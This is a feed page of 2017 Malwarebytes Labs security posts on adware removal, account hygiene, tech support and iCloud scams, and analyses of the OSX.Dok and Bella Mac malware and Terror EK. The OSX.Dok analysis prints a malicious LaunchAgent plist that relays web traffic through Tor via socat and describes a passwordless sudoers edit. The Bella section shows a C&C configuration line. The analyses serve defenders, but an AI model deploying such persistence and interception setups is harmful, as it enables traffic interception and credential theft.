Malwarebytes - Wed, 05/03/2017 - 15:00

In this post, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Reroute and intercept

We will discuss a few methods to reroute, intercept, and change your internet traffic. They are:

  • Proxies, using a third party server between the machine and the internet.
  • LSP hijacks, inserting a third party file into the winsock.
  • DNS hijacks, connecting to another site by altering the Domain Name System results.


If a system-wide proxy on a Windows computer is set, you will almost always find it in the Microsoft browser. In Internet Explorer, you can find it under Menu (gear icon) > Internet Options > on the Connections tab click the LAN settings button:

Remove the tick under Proxy server to remediate the problem.

In Edge, in the Menu (three dots) select Settings > View Advanced Settings > Open proxy settings > Turn Use a proxy server to Off to disable the proxy.

Browser specific proxies are rare, but I wanted to list the options to change the proxy in your favorite browser anyway.

For Chrome:
  • Click the menu icon
  • Choose Settings (alternatively paste chrome://settings/ into your address bar)
  • Click on Show advanced settings…
  • In the “Network” Section, click Change Proxy Settings. This will open the Internet Properties window, where you can access the LAN Settings as shown above.
For Firefox:
  • Click the menu icon
  • Choose Options
  • Select the Advanced tab (alternatively paste about:preferences#advanced into your address bar)
  • Select the Network tab
  • Under Connection click on Settings and you will see the proxy configuration options

For Opera:
  • Open the menu
  • Choose Settings
  • Open the Browser tab
  • Under Network click the Change proxy settings… button
  • This will open the Internet Properties window, where you can access the LAN Settings as shown earlier.

If you notice that the proxy is running through a port on your localhost (, there is a way to find out which process is responsible. Using the command netstat –ab in a command prompt (elevated as an Administrator) will reveal which process is listening on the port (8003 in our example below).

BetterAds adware having control over port 8003

LSP hijackers

A Layered Service Provider (LSP) is a file (usually a DLL) using the Winsock API to insert itself into the TCP/IP stack. There it can intercept, filter, and modify all the traffic between the internet and a system’s applications. LSPs are stacked parts of the Windows Sockets API (Winsock 2). The layering order of all providers is kept in the Winsock Catalog. As a consequence, LSPs have to be uninstalled. Just ripping out the file that acts as the LSP could result in a broken internet connection. If Malwarebytes removes an LSP hijacker from your system it will require a reboot to prevent this disconnection from happening.

DNS hijacks

Domain Name Service (DNS) hijacks can be performed at many levels, but in the scope of this series, we will only deal with the ones that act on the system itself.

(a) DNS cache poisoning

By feeding your DNS resolving process false data (in such a case, the wrong IP for a certain domain), the system will at some point no longer query the DNS server for the IP but use the wrong data it has in his cache.

Remediation: To clear the Windows DNS cache use the command ipconfig /flushdns in an elevated command prompt.

(b) Hosts file hijacks

The hosts file is a special file located in %windir%\System32\drivers\etc that can be used to store IP addresses that you want to associate with certain domains. This can be used to block advertisements and malicious sites or to map out a local intranet. Adware sometimes uses hosts file of their own making to replace the one on the victim’s system to hijack traffic.

Remediation: You can edit the hosts file in notepad (elevated). Even though it has no extension it is a text file.

(c) DNS server settings

The DNS server settings are normally stored under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters in the NameServer value which should hold two comma-separated IP addresses that represent the DNS servers for the internet connection that is currently in use.

Remediation: Change the DNS servers for the active internet connection by looking at the properties of the connection in the “Network and Sharing Center”.

For most ISPs this is the recommended setting. If yours are different you may find the necessary information on the provider’s site.

Index Part 1:
  • Identify the process
  • Clear browser caches
  • Remove browser extensions
Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers
Up next, part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file


Pieter Arntz

The post Adware the series, part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

An Infosec Spring clean

Malwarebytes - Tue, 05/02/2017 - 15:00

We’re a month or so into Spring and it may well be time you had a spring clean – ha, ha, and so on – of your security settings and general hygiene. You probably have lots of accounts, but it’s easy enough to divide them up before getting on with the “how secure is all this stuff anyway” task ahead of you:

1. Lock down your mission critical accounts.

Throw your really important email address, that social media account you maintain for work, and the cloud storage account with all your important things in it under this banner.

  • Do you use 2FA, like Google Authenticator?
  • Do you have a backup plan in place in case you lose your phone (and thus access)?
  • Are you using a password manager?
  • Do you have all security features enabled?
  • Do you use regional lockout and need to alter these settings before hitting the road? Or does it have a Plan B to let you alter on the fly?
  • What’s your website?
  • Does your host have a secure login setup or should you be looking to move to a more reliable provider?
  • Do you have one foot in the pool of domain registration? If they provide additional security features related to privacy/anti-spam/”locking” the domain, are you using them?

Also of note, but easy to forget: your gaming accounts, which (depending on sales) may have hundreds or even thousands of dollars invested in them over time. It’s certainly a pain to micromanage lots of client logins from Steam to UPlay and back over to Origin, but having said that, all of your password juggling problems can quickly be resolved by deploying your favorite password manager of choice.

These are probably the main items of concern you’ll want to concern yourself with.

2. Be aware of third party access permissions.

One of the web’s biggest strengths is being able to tie all of our programs and services together. It’s great! Unfortunately, it’s also not great and can lead to major problems should one of those services be compromised. It only takes one hack and then you’re pushing all sorts of wacky content (and by wacky, I mean “help, my eyeballs are melting“). There is no real solution to this one; if a third party service is popped while you’re in bed asleep, you’re going to wake up to disaster.

What you can do, is jump into application settings/management and see what lies within. If you have a bunch of old apps you haven’t used for in ages, revoke permissions. Not sure how app X or Y got there in the first place? Revoke. It doesn’t matter whether the unused app is a big brand or something a teenager cobbled together in their bedroom – everything is potentially hackable, but this is all about reducing the risk a little bit. If you still get caught after amending your settings to something you’re comfortable with, don’t feel too bad about it.

3. Look after your Nothingburger accounts.

We all have them – those accounts we create purely because we have to, or ones we use for buying things on an occasional basis. Forum registrations. That one gaming site you can’t stop screaming at people in ALL CAPS. The only seller of that unique brand of salad dressing you like. Something about cat memes.


Don’t fall into the trap of cursing them all with the same username/email/password combination, on the basis that they’re all “disposable”. You might not think they’re important, but most of these Nothingburgers contain a juicy filling. A forum registration with your real DOB here, a shopping account with your real name and address there, or that gaming forum with a pile of HERE’S MY PHONE NUMBER, FIGHT ME private messages from 2008. All of this can be used against you. The moment one is popped, the hackers will try those same credentials against lists of other websites. At that point, it’s game over – and let’s face it, nobody wants to spend 3 hours trying to reclaim a dozen stolen logins while wading through a conga line of tech support.

Do the right thing and generate a bunch of random passwords via your favorite password creation tool. Mmm! That is a tasty nothingburger!

If you’ve shored up your super important accounts, dealt with the generic logins, and sorted out third party permissions, you’ve probably come to the end of your great Spring clean-out. There’s always something else to fix or tune up, but the above is certainly a quick and easy way to divide up the gigantic pile of accounts you probably have in your gigantic account pile of accounts bag. If there’s others we’ve left out, or you have additional “how to manage this mess” tips, feel free to leave them in the comments.


Christopher Boyd

The post An Infosec Spring clean appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Another OSX.Dok dropper found installing new backdoor

Malwarebytes - Mon, 05/01/2017 - 18:16

On Friday a sophisticated Mac Trojan was discovered, called OSX.Dok, which installs malware designed to intercept all HTTP and HTTPS traffic. This morning, Adam Thomas, a Malwarebytes researcher, found a variant of the OSX.Dok dropper that behaves altogether differently and installs a completely different payload.

Distribution method

This variant has the same form as the dropper for OSX.Dok – a zipped app named, masquerading as a document. It is signed with the same (now revoked) certificate as the previous OSX.Dok dropper and it was first uploaded to VirusTotal around the same time.

OSX.Dok.B SHA-256: 54ee71f6ad1f91a6f162bd5712d1a2e3d3111c352a0f52db630dcb4638101938

As with the previous variant, this one also copies itself to /Users/Shared/, and displays the same alert claiming that the app is damaged:

However, this variant never displays the fake “OS X Updates Available” window, covering the entire screen. After a minute or so, it simply closes and deletes itself.

Instead of installing OSX.Dok, this dropper installs an open-source backdoor named Bella, created by someone who identifies himself on GitHub only as “Noah.”

Behavior analysis

Noah first joined GitHub back in 2015 but was not active there until August of 2016, when he began creating Python scripts to attack various macOS data, such as stealing iCloud authorization tokens, or password and credit card information from Chrome.

In February of this year, he published the code for Bella, a Python script with some frightening capabilities, including:

  • Exfiltration of iMessage and SMS chat transcripts
  • Location of devices via Find My iPhone and Find My Friends
  • Phishing of passwords
  • Exfiltration of the keychain
  • Capture of data from the microphone and webcam
  • Creation and exfiltration of screenshots
  • Remote shell and screen sharing

Bella even includes the capability to escalate to root privileges via vulnerabilities in the system (which only work on macOS 10.12.1 and earlier) or phishing to obtain an admin user password. Some of the above capabilities rely on gaining root privileges, while others do not.

Bella comes with a script named BUILDER that can be used to customize some aspects of its behavior. This particular copy of Bella has been configured to connect to the following C&C server:

host = '' #Command and Control IP (listener will run on) port = 4545 #What port Bella will operate over

This address is owned by a hosting company located in Moscow, Russia.

The malware has also been set to install the script, database, and launch agent files in the following locations:

~/Library/Containers/.bella/Bella ~/Library/Containers/.bella/bella.db ~/Library/LaunchAgents/

If root access can be achieved, it will instead be placed in the corresponding locations in the root Library folder, rather than the user’s Library folder.


Of course, since the code signing certificate on the dropper for this malware has been revoked, no one can be newly-infected by this particular variant of this malware at this point. However, since Bella is open-source and surprisingly powerful for a Python script, it’s quite likely it will be dropped by other malicious installers in the future.

It is unknown whether there is any connection between Noah, the author of Bella, and the creators of the OSX.Dok malware. Bella may simply have been used by unrelated hackers since it is freely available as open-source software.

Malwarebytes for Mac detects this malware as OSX.Bella. If you’ve been infected with this malware, after removing it, be sure to change all your passwords as well.

Business users should be aware that this malware could exfiltrate a large amount of company data, including passwords, code signing certificates, hardware locations and much more. If you’ve been infected, contact your IT department.

The post Another OSX.Dok dropper found installing new backdoor appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (Apr 24 – Apr 30)

Malwarebytes - Mon, 05/01/2017 - 17:07

Last week we gave some important tips on how to secure your privay on Android and we warned our readers about a new iCloud scam and unraveled a new Mac Malware known as OSX.Dok.

Tech support scammers can be very convincing, so we showed you how you can determine whether you are dealing with the actual company or someone pretending to be their tech support. Also, Tech support scams are so lucrative that some PUPs, specifically “system optimizers”, decided to increase their playing field to include scamming.

We also made a start with a new series about Adware and took a quick peek at the changes the Terror Exploit Kit is going through. And we gave you a more detailed overview of how the EITest campaign tries to trick users into downloading a fake font file.

We realize how all this advice can be overwhelming and posted some tips on how to fight security fatigue.

Below are notable news stories and security-related happenings:


Stay safe!


The Malwarebytes Labs Team

The post A week in security (Apr 24 – Apr 30) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New OSX.Dok malware intercepts web traffic

Malwarebytes - Fri, 04/28/2017 - 18:00

Most Mac malware tends to be unsophisticated. Although it has some rather unpolished and awkward aspects, a new piece of Mac malware, dubbed OSX.Dok, breaks out of that typical mold.

OSX.Dok, which was discovered by Check Point, uses sophisticated means to monitor—and potentially alter—all HTTP and HTTPS traffic to and from the infected Mac. This means that the malware is capable, for example, of capturing account credentials for any website users log into, which offers many opportunities for theft of cash and data.

Further, OSX.Dok could modify the data being sent and received for the purpose of redirecting users to malicious websites in place of legitimate ones.

Distribution method

OSX.Dok comes in the form of a file named, which is found being emailed to victims in phishing emails. Victims primarily are located in Europe.

If the victim falls for the scam, the ZIP file decompresses into a file named “Dokument”, which (oddly) has been given the same icon as older versions of Apple’s Preview app. This is not the same as an icon given to a document that can be opened by Preview. Plus, the icon is oddly pixelated, which should raise some red flags among alert users.

Behavioral analysis

This “document” is, of course, actually an application. Fortunately, when the user attempts to open this app, the macOS will display a standard notification to warn the user of that fact:

Apple has already revoked the certificate used to sign the app, so, at this point, anyone who encounters this malware will be unable to open the app and unable to be infected by it.

If the user clicks past this warning to open the app, it will display a warning that the file could not be opened, which is simply a cover for the fact that no document opened:

Interestingly, this window cannot be dismissed, as the OK button does not respond. Further, the app will remain stuck in this mode for quite some time. If the user becomes suspicious at this point and attempts to force quit the app, it will not show up in the Force Quit Applications window and in Activity Monitor, it will appear as “AppStore.”

If the user manages to force this “AppStore” app to quit, however, all is not yet okay. The malware dropper will have copied itself onto the /Users/Shared/ folder and added itself to the user’s login items so it will re-open at the next login to continue the process of infecting the machine.

After several minutes, the app will obscure the entire screen with a fake update notification.

This will remain stubbornly on the screen and will come back on restart since the malware is in the user’s login items. If the user clicks the Update All button, the malware will request an admin password.

The malware will remain in this mode for quite some time, leaving the computer unusable to the user until it completes. This is quite different from any normal macOS update process and anyone who is intimately familiar with macOS will know that something is wrong, but those who don’t know better could easily be fooled into thinking this is a normal procedure for an important security update.

Once the user has provided an admin password, the malware makes a change to the /private/etc/sudoers file, which controls access to the sudo command in the Unix shell. A line like the following is added to the end of the sudoers file:


This line specifies that the indicated user—”test” in this case—is allowed to use sudo without the need for a password, ensuring that the malware is able to have continued root-level permission without continuing to request for an admin password.

Meanwhile, there is a very good reason for the lengthy install time: OSX.Dok will be busy using its ill-gotten root privileges to install all manner of software in the background, including macOS command-line developer tools, which are needed for the other tools it will install.

The malware will also install Homebrew, a command-line installation system. Homebrew will, in turn, be used to download and install other tools, including tor and socat. The malware will use these processes to funnel all HTTP and HTTPS traffic through a malicious proxy server.

Two files will be installed in the user’s LaunchAgents folder to redirect this traffic. The first of these, named has the following contents:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string></string> <key>ProgramArguments</key> <array> <string>/usr/local/bin/socat</string> <string>tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=</string> <string>SOCKS4A:,socksport=9050</string> </array> <key>RunAtLoad</key> <true/> <key>StandardErrorPath</key> <string>/dev/null</string> <key>StandardOutPath</key> <string>/dev/null</string> <key>WorkingDirectory</key> <string>/usr/local</string> </dict> </plist>

The second, named, has the same contents, except that it uses port 5588 in place of ports 5555 and 80.

As an added kick in the pants, OSX.Dok installs a new trusted root certificate in the system with the name “COMODO RSA Extended Validation Secure Server CA 2.” Using this certificate, it can impersonate any website convincingly, as part of the process of tampering with web traffic.

Once all this is complete, the malware deletes itself from /Users/Shared/, leaving behind few obvious signs of its presence. The LaunchAgents folder is the only change that is likely to be noticed by some users, and many will not understand that these .plist files are not actually associated with Apple.


Removal of the malware can be accomplished by simply removing the two aforementioned LaunchAgents files, but there are many leftovers and modifications to the system that cannot be as easily reversed. Changes to the sudoers file should be reversed and a knowledgeable user can easily do so using a good text editor (like BBEdit), but making the wrong changes to that file can cause serious problems.

A LaunchAgents file named homebrew.mxcl.tor.plist will have also been installed. Since this is a legitimate file, it shouldn’t be detected as malicious, but people who didn’t have this installed already should remove it.

The bad certificate should be removed from the System keychain using the Keychain Access application (found in the Utilities folder in the Applications folder.)

The numerous legitimate command-line tools installed, consisting of tens of thousands of files, cannot be easily removed.



Malwarebytes Anti-Malware for Mac will detect the important components of this malware as OSX.Dok, disabling the active infection. However, when it comes to the other changes that are not easily reversed, which introduce vulnerabilities and potential behavior changes, additional measures will be needed. For people who don’t know their way around in the Terminal and the arcane corners of the system, it would be wise to seek the assistance of an expert, or erase the hard drive and restore the system from a backup made prior to infection.



The impact on business could be much more severe, as it could expose information that could allow an attacker to gain access to company resources. For example, consider the potential damage if, while infected, you visited an internal company page that provided instructions for how to connect to the company VPN and access internal company services. The malware would have sent all that information to the malicious proxy server.

If you have been infected by this malware in a business environment, you should consult with your IT department, so they can be aware of the risks and begin to mitigate them.


Thomas Reed

The post New OSX.Dok malware intercepts web traffic appeared first on Malwarebytes Labs.

Categories: Techie Feeds

System optimizers turning to Tech Support Scams

Malwarebytes - Thu, 04/27/2017 - 15:00

A new trend, which was also pointed out in our Q1 cybercrime report, is the combination of PUPs and Tech Support Scams. Most of these PUPs are so-called system optimizers. This is worrying as the damage done by PUPs was limited or we would have marked them as malware. By adding Tech Support Scams to their portfolio the possible damages have increased considerably.

How are system optimizers combining the two?

The easiest way to spot this connection is by looking at the use of telephone numbers in the GUI of system optimizers. Get this straight, we’re not saying that every company that does this is actively out to scam its customers, but the increase of telephone numbers on applications that were installed by bundlers has been notable. And, let’s face it: why would I want to call a company that puts their software on my computer without my consent? Oh well, besides to yell at them.

But the people that make those calls in good faith, do end up paying for the potentially unwanted programs and anything else the scammers manage to sell them.

For example when one of our investigators called the number showing on the PUP working under the name “Registry Scanner” which hails from the domain lishbos[.]com –


— he was sold a two-year subscription to a “Gold Offer” from epicsofts[.]com for the amount of $99 and the remote support technician downloaded yet another “System Cleanup” utility to his system.

Of course, that utility turned out to be yet another PUP.

Our fight against Tech Support Scammers

As an anti-malware company, there is little for us to gain by fighting Tech Support Scammers. But unfortunately  there is no security program that can protect you from being scammed, besides informing potential victims about the risks.  But as a company that cares about its customers, we have always actively committed to this fight in the past and we will continue to do so in the future. And hearing that people have paid hundreds of dollars for OUR software and then sometimes ended up with a key that doesn’t work, hurts our feelings, and it could cost us potential customers.

How we fight Tech Support Scammers

At Malwarebytes, we have a dedicated team that performs research into Tech Support Scammers and works with the authorities to get them shut down. In cases where legal action is not possible, due to their location outside of our legal reach, we try to work through other channels like:

  • ISPs, if they are willing to take down the scammers’ website, which slows down the scammers, but usually only for a while.
  • Payment processors, to cripple their ability to work with reputable payment processors will force them to us much less convenient alternatives.
  • Search engines, to get their advertisements removed. They pay a lot of money to get at the top of your search results.
  • Foreign authorities, we hand over the evidence we have gathered and have to hope that something gets done about it.
  • Name and shame, when all of the above fails we publish the information we have gathered and hope that the scammers’ business associates will no longer want to do work with them.
Related posts


Pieter Arntz

The post System optimizers turning to Tech Support Scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A story of fonts by the EITest HoeflerText campaign

Malwarebytes - Wed, 04/26/2017 - 19:45

One of the most common malware campaigns from compromised websites is known as EITest and has traditionally been redirecting victims towards exploit kits. But it also has an alternate payload for browsers other than Internet Explorer, specifically for Google Chrome, where it tricks users into downloading a fake font file.

The technique first exposed by Proofpoint, is simple and yet so clever because it truly creates an illusion that there is a problem with the site being viewed. In addition, the prompt to download the ‘Chrome Font Pack’ looks sleek and professional:

The downloaded file is not a font of course, but malware. The perpetrators have used the standard name “Chrome font.exe” and a few other variations, but they have been playing with character encoding as well. This alters the file name enough (perhaps to break simple signature detection?) but still looks almost identical to the naked eye.

This is how the file looks, side by side with the classic UTF encoding:

When Windows doesn’t recognize the character set, it will display ‘?’ instead. Here’s a quick view of this encoding (courtesy of Unicode Analyzer).

Users that proceed and install the so-called font are immediately infected with the Spora ransomware:

Malwarebytes already protects you against Spora thanks to its behaviour-based ransomware detection engine.

The post A story of fonts by the EITest HoeflerText campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 1

Malwarebytes - Wed, 04/26/2017 - 15:00

In this series, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most adware will be classified as PUPs, you will also see the occasional Trojan or rootkit, especially in the types of adware that are harder to detect and remove.


It all starts with advertising.

To give you an idea how much money goes around in this industry, the US online ad spending for 2016 was estimated at $ 62 Billion. Anyone that is able to grab a chunk of that will be very happy to do so, even if the methods are considered iffy. Some will not shy away from criminal behavior when that kind of money is involved. Two of the fraudulent methods to grab some of that money are called ad fraud and adware. If you want to learn the difference between these two please read my blog post, Adware vs Ad fraud. In this post, we will concentrate on adware, which basically boils down to some program on your computer showing you advertisements that do not come from the websites you are visiting.

Identify the source

We will use Process Explorer to identify the process that is behind an advertisement. Usually, this will be a browser and you will recognize it as such. But sometimes, these advertisements pop up as windows without title bars. In cases like these, you can use the cross-hairs in the Process Explorer menu, as shown below:

Drag and drop the cross-hairs on the window you are curious about and in the Process Explorer list of running processes the process responsible for the window will be selected (showing in blue).

You now have the name of the process and, in case there are more instances of that process, the Process Identification (PID) associated with it.

Check where the process is connecting to

This is optional since it almost never provides any information that is useful in the removal process. Extra research, however, could tell us what family the adware belongs to and what characteristics you may expect as a result.

So, if you like, you can use the Windows built-in (after XP) tool Resource Monitor (resmon). To start Resource Monitor, you can use Windows Key + “R”, type “resmon” in the “Run” box and click OK.

Under the Network tab > Network activity, you will find the most specific information for any connected process.

If one process has several open connections you can click the “Image” column header to sort the processes alphabetically, which provides a better overview of what a given process might be doing. Also, check if the PID listed in Process Explorer matches the one in Resource Monitor. This should be done to make sure that you are looking at the process that is showing the advertisement.

Browsers first

As this will be the most common case, let’s deal with it first. The window showing the advertisement is a window or new tab of your default browser. Some adware authors find it easier or more effective to open the Microsoft browser that came with the OS, so they will open Edge for Windows 10 and Internet Explorer (IE) for earlier versions.

Clear your browser’s cache

In Edge, the procedure is:

  1. Click the Hub icon, click “Clear History”
  2. Select the appropriate options. Note that clearing the “Cookies and saved website data” will result in you having to login at every site again.
  3. Click the “Clear” button.


For Internet Explorer:

  • Click the gearbox icon
  • Select Internet Options
  • On the General tab click on the Delete button under Browsing history
  • Select the appropriate categories. Note that clearing the “Cookies and website data” will result in you having to login at every site again.

  • Click the Delete button if you are happy with your choices.

For Firefox:

  1. Click the menu button and choose Options.
  2. Select the Advanced panel.
  3. Click on the Network tab.
  4. In the Cached Web Content section, click Clear Now.

For Chrome:

  1. On your browser toolbar, click More (3 dots)
  2. Point to More tools, and then click Clear browsing data.
  3. Select the items that you want to clear.
  4. Click the Clear browsing data button.


For Opera:

  1. In the Opera Menu choose Settings
  2. Select Privacy and Security
  3. Under Privacy click the Clear browsing data… button
  4. Delete the items you wish to delete
  5. And click on the Clear browsing data button

Removing extensions and toolbars

Extensions and toolbars are so closely related that removing the extension will usually take the toolbar out as well.

Internet Explorer:  Tools (gear icon) > Manage add-ons > Toolbars and Extensions > Select the one(s) you don’t trust one by one and click “Disable”

Firefox:  Menu (horizontal stripes) > Add-ons > click on “Disable” behind the ones you don’t trust or don’t recall installing.

Chrome: Menu (horizontal stripes) > Settings > Extensions > Uncheck “Enabled” behind the ones you don’t trust or don’t recall installing.

Opera: click the Opera icon > Extensions > Extension Manager > click on Disable below the ones you don’t trust or don’t recall installing.


Part 1:

  • Identify the process
  • Clear browser caches
  • Remove browser extensions and toolbars

Up next, part 2

  • Proxies
  • Winsock hijackers
  • DNS hijackers


Pieter Arntz

The post Adware the series, part 1 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Terror EK going ‘pro’? Not quite yet

Malwarebytes - Wed, 04/26/2017 - 13:00

Since our last post on Terror EK, we haven’t really seen much activity from this exploit kit. However, in recent days it popped back up again with a slightly new format.

One thing that seemed consistent with Terror EK was the use of a plain IP address in its URL structure:

Now we are starting to see it using a domain name (with the .pro TLD).

The campaigns

We are seeing the usual suspects via malvertising from low quality traffic as well as decoy sites. The same obfuscation technique we talked about in our last post can still be found on domains registered by a Brian Krebs admirer, unlikely to be his son though.

Traffic overview

EK artifacts Initial landing

Flash calls

Silverlight calls

IE exploits

The landing page and associated calls to IE, Flash, and Silverlight exploits are still in plain text. The exploits also appear to be the same old Sundown EK ones.

The developer of this exploit kit has been experimenting and making tweaks for a while now. While there are a few malvertising campaigns leading to Terror EK, the lion share still belongs to RIG EK.


Domain name:

IP address:


Flash exploit:


Silverlight exploit:




The post Terror EK going ‘pro’? Not quite yet appeared first on Malwarebytes Labs.

Categories: Techie Feeds

iCloud support scams

Malwarebytes - Tue, 04/25/2017 - 16:00

iCloud is an increasingly large target for scams of all kinds. It’s a common target for scams involving phishing e-mails. The goal of such scams is to get you to click a link that takes you to a fake iCloud login page, resulting in you submitting your iCloud login credentials to thieves. It’s also frequently attacked via brute-force guessing of weak passwords and weak security questions.

The results of such scams can vary. Some are interested in the purchasing power since iCloud accounts double as Apple IDs, which can be used to make purchases from the Mac App Store, iOS App Store, and even the online and brick-and-mortar Apple Stores.

Other scammers want access to your files – typically photos stored in iCloud – such as the “Celebgate” incident. Celebgate involved a number of celebrities who had their accounts compromised, resulting in the theft and subsequent publication of nude photos.

There was even the recent case of compromised iCloud accounts that were used in an attempt to extort money from Apple, under the threat of wiping all devices associated with the compromised accounts. (It turned out the hackers had far fewer accounts than they claimed and the threatened erasure of devices never happened.)

There’s no doubt, though, that iCloud/Apple ID login credentials are popular targets for hackers.

Interestingly, a Malwarebytes employee has spotted a new iCloud scam attempt. Twice in one day, she received unsolicited phone calls, supposedly from Apple Support, claiming that her iCloud account had been hacked “by Russian hackers,” and asking for her account information.

The first call was from a 1-800 number not associated with Apple. Interestingly, caller ID reported that the second call originated from a legitimate Apple phone number in the 408 area code… which really means nothing these days, as it has become trivial to spoof a phone number for caller ID. (I frequently see local or even familiar phone numbers on the caller ID for scam calls… scammers do this to increase the chances of getting the victim to pick up the phone.)

It’s also worth pointing out that searching the web for something like “Apple support phone number” can also put you in touch with scammers rather than official Apple support. If you’re calling Apple for support, only do so using the contact information found on Apple’s support site (

Fortunately, she was not fooled and did not give up her account information. It’s important to keep in mind that Apple will not call you in this manner and will not ask you to give them your account information. If someone claiming to be Apple wants this information, hang up.

The correct response if you think your iCloud account has been hacked, and what an Apple representative should tell you to do, is to go to Apple’s website (, then search for and log into the Apple ID account page. Once there, you can change your account password.

Incidents like this also underscore the need to activate two-factor authentication on your Apple ID/iCloud account.

Be on your guard against scams involving your Apple ID. Never give out your credentials to anyone, not even an Apple representative, and never log in with your Apple ID to any site you reach by clicking a link in an e-mail message.

The post iCloud support scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Do I have Malwarebytes or a tech support scam?

Malwarebytes - Tue, 04/25/2017 - 15:00

A lot of companies don’t make clear who their tech support is, what their relationship to that group is, and what the difference is between ‘licensed’, ‘authorized’, ‘partner’, ‘reseller’, and ‘actually an employee, we swear.’ You might call up a company for help and get one of their employees in East Haven, CT. Call at another time and you might get a contracted boiler room in India that provides support for 10 other companies. Given the wide variety in how legitimate companies handle their support, can you tell the difference between tech support and a tech support scam? Here are a few points to differentiate us:

1. The company gives you any name at all other than Malwarebytes. 

We do not outsource our support. There are no third parties “authorized” to provide support. Nobody is “licensed” to use our name, logo, or any other intellectual property. One more time for emphasis:

Malwarebytes does not outsource its technical support.

2. The company can’t or won’t take your credit card the first time you ask.

Reputable organizations don’t do this. Period. Malwarebytes has a credit card processor that takes payments for all transactions. Credit card processors do things like vet clients for risk, fraud, and abuse. So if you, as a company, have trouble doing business with one, it suggests strongly that your business model fits into one of those three categories. Credit cards also have reasonably robust consumer fraud protection, so if you’re being steered away from using one, that is also a red flag that the company is about to do something they probably shouldn’t. See this blog post for more.


3. The company has prominent information on refunds in their FAQ.

If how to get your money back is frequently asked enough to warrant its own page on the company’s website, there might be some issues with the company.


4. The company refer to themselves as Boomerang, Geek Software Experts, Zole Global, Antivirus Masters, or Guruaid.

Malwarebytes does not have a relationship with these companies and they have extensive, public histories of unhappy customers. If you have had any negative contact with these companies when you were trying to get a hold of us, please post in the comments section below.


5. The company makes outbound support calls.

Malwarebytes does not do this. Tech support companies that make outbound unsolicited calls tend to do so because they bought your personal information from a data broker who classified you as a vulnerable target. Furthermore, how would they know you have a problem with your computer? How would they even know you own a computer?


6. You clicked on an ad by mistake.

Looking at that first result, did you catch that minuscule box that says “Ad” in the same color and font as the URL? No? Then you might end up accidentally talking to someone who isn’t us, but spent enormous amounts of dollars for an ad slot that looks kind of like the first organic search result. Remember:

Malwarebytes does not outsource its technical support.


If you didn’t come by support via, you do not have us. So if you expected us and for whatever reason ended up with somebody else, what do you do? First of all, if you’ve allowed a company that you have doubts about to access your computer, end the session, then hang up the phone. Then, check out our resource page here to find out what to do next and how to protect yourself going forward. Lastly, if you’ve had any unpleasant experiences with the companies referenced above, let us know in the comments as well.

William Tsing

The post Do I have Malwarebytes or a tech support scam? appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds